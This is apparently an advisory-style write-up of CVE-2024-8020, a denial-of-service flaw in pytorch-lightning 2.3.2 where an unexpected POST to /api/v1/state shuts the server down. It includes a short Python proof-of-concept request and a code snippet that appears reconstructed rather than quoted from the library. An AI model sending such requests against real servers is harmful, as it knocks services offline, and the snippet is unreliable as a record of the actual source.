CVE-2024-8020: Vulnerability in lightning-ai/pytorch-lightning 2.3.2 Denial of Service Attack through Unexpected POST Requests

A critical vulnerability (CVE-2024-8020) has been discovered in the lightning-ai/pytorch-lightning version 2.3.2. This vulnerability allows an attacker to cause a denial of service by sending an unexpected POST request to the /api/v1/state endpoint of LightningApp. The issue stems from improper handling of unexpected state values, which results in the server shutting down.

Exploit details

The vulnerability exists in the LightningApp class defined in the lightning_app.py source file. Specifically, the issue lies in the state.setter method, which does not handle unexpected state values properly. Here is the relevant code snippet:

class LightningApp:
    ...
    @state.setter
    def state(self, value):
        if isinstance(value, str) and value.lower() in self.states:
            self._state = value.lower()
        else:
            print("Invalid state value, shutting down...")
            self.shutdown()

As you can see, when an unexpected state value is set, the server automatically shuts down, resulting in a denial of service. An attacker can exploit this vulnerability by sending a carefully crafted POST request to the /api/v1/state endpoint.

To mitigate the vulnerability, the server should not shut down when receiving an unexpected state value. Instead, it should return an appropriate error message indicating that the request was invalid.

The following is a simple Python script that demonstrates the exploit

import requests

target_url = "http://localhost:500/api/v1/state";
payload = {"state": "unexpected_value"}

response = requests.post(url=target_url, json=payload)
print(response.status_code)

This script sends a POST request to the target URL with an unexpected state value. If the request is successful, the server will shut down, and the script will print the HTTP response status code.

Original reference

- NVD - CVE-2024-8020

Codebase in question

- LightningApp class code

Recommended Actions

We recommend all users of lightning-ai/pytorch-lightning version 2.3.2 to update to the latest version as soon as possible. Additionally, developers should implement proper error handling and validation for user-submitted data to prevent similar issues in the future.

Timeline

Published on: 03/20/2025 10:15:39 UTC